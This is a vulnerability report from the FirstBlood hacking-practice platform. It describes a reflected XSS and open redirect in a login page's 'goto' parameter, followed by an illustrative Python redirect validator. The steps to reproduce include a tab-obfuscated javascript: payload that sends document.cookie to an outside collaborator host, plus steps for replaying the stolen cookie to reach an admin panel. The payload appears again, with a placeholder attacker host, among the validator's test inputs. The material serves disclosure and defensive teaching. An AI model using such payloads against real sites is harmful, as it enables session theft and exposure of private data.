FirstBlood-#432 — Open Redirect on login page with "goto" parameter leading to account takeover
This issue was discovered on FirstBlood v2
On 2021-10-25, xnl-h4ck3r Level 4 reported:
Summary
There is a hidden parameter called goto on /login.php that redirects to another location after login.
There is an open redirect vulnerability that allows an attacker to craft a URL to send to the victim so that after they log in on the genuine First Blood site, they are redirected to the attacker's website, and the auth cookies are also passed to the attacker's site. The web application fails to filter the javascript URI upon redirecting.
Steps to Reproduce
- Go to the link http://firstbloodhackers.com:{PORT}/login.php?goto=j%09avascript:document.location=%27http://{BURP_COLLAB_URL}/%27%2bdocument.cookie
- Enter a valid user name and password and click SECURE LOGIN
- Observe that the user is taken to the attacker's website, and the cookies and their values have been leaked to the attacker.
- Clear all cookies and go to the web app again but do not log in.
- Add the cookie shown in Step 3 and go to /drpanel/index.php and observe that you are now logged in as admin and can view patient data.
Impact
If a victim goes to the web app using this link and logs in, the attacker is able to capture the auth cookies and redirect the user wherever they want. The user may be unaware of what has happened, and the attacker can use the cookies to access the doctor management panel as them and view patient PII data.
P3 Medium
Endpoint: /login.php
Parameter: goto
Payload: j%09avascript:document.location=%27http://{BURP_COLLAB_URL}/%27%2bdocument.cookie
FirstBlood ID: 39
Vulnerability Type: Reflective XSS
Our mistake: The parameter "goto" on login.php should have been "fixed" when redirecting to prevent XSS, but due to an oversight from Sean and Karl, the new code did not make it into production. This has since been updated since the event ended and you're recommended to re-try. It's related to bug ID 26, because the idea was developers fixed *this* one (when redirecting) but forgot the other reflection.
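The report turns on the redirect code trusting a raw goto value, and on a filter that can be defeated by a tab inside the scheme (j%09avascript:), which browsers silently remove before parsing. As an added example that is not FirstBlood's code and not the reporter's, here is a Python validator showing the allow-list approach a server-side fix would take: normalize the value the way a browser does, then accept only an absolute path on the same origin and fall back to a fixed default (/drpanel/index.php, taken from the report) for anything else. The function names, the attacker.example host and the sample inputs are constructed for this illustration.

```python
from typing import Optional
from urllib.parse import unquote, urlsplit

# Characters browsers delete from anywhere in a URL before parsing (ASCII
# tab, LF and CR, per the WHATWG URL standard). A filter that searches the
# raw string for the literal text "javascript:" without doing this first is
# bypassed by "j%09avascript:", which is exactly the shape of the payload
# in this report, so the normalization has to happen before any check.
_BROWSER_STRIPPED = "\t\n\r"
# Browsers also trim leading and trailing C0 controls and spaces.
_C0_AND_SPACE = "".join(chr(i) for i in range(0x21))


def normalize_redirect_target(raw: str) -> str:
    """Canonicalize a user-supplied redirect value the way a browser would
    before it decides which scheme the URL has."""
    decoded = unquote(raw)                                   # %09 -> tab, %27 -> quote
    cleaned = decoded.translate({ord(c): None for c in _BROWSER_STRIPPED})
    return cleaned.strip(_C0_AND_SPACE)


def is_safe_redirect_target(raw: str) -> bool:
    """Allow only an absolute path on this origin, e.g. /drpanel/index.php.

    Anything with a scheme (javascript:, data:, http:) or an authority
    (//evil.example) is rejected, so the post-login redirect can never
    leave the site, regardless of case or encoding tricks in the input.
    """
    target = normalize_redirect_target(raw)
    parts = urlsplit(target)                 # scheme is lower-cased by urlsplit
    if parts.scheme or parts.netloc:
        return False                         # javascript:, JaVaScRiPt:, http://, //host
    if not target.startswith("/") or target.startswith("//"):
        return False                         # relative path or protocol-relative URL
    if "\\" in target:
        return False                         # some browsers treat "\" like "/"
    return True


def safe_redirect_location(raw: Optional[str], default: str = "/drpanel/index.php") -> str:
    """Return the value to emit in the Location header after a successful login."""
    if raw is None:
        return default
    return normalize_redirect_target(raw) if is_safe_redirect_target(raw) else default


if __name__ == "__main__":
    # Constructed sample goto values; attacker.example is a placeholder host.
    samples = [
        "/drpanel/index.php",
        "/drpanel/index.php?patient=1",
        "%09/drpanel/index.php",
        "j%09avascript:document.location=%27http://attacker.example/%27%2bdocument.cookie",
        "JaVaScRiPt:alert(document.domain)",
        "//attacker.example/",
        "/\\attacker.example/",
        "http://attacker.example/",
    ]
    for s in samples:
        print(f"{s!r:85} -> {safe_redirect_location(s)}")
```

Two design notes. First, the validator decodes and strips before it looks at the scheme, so the tab trick and mixed-case schemes collapse to the same rejected form; any filter that inspects the raw percent-encoded string instead will keep being bypassable. Second, a javascript: target only executes when the redirect is performed client-side (for example by assigning window.location from the parameter); a server-sent Location header pointing at javascript: is not navigated to by browsers, so moving the redirect server-side and validating as above closes both the script execution and the plain open-redirect-to-another-host case at once.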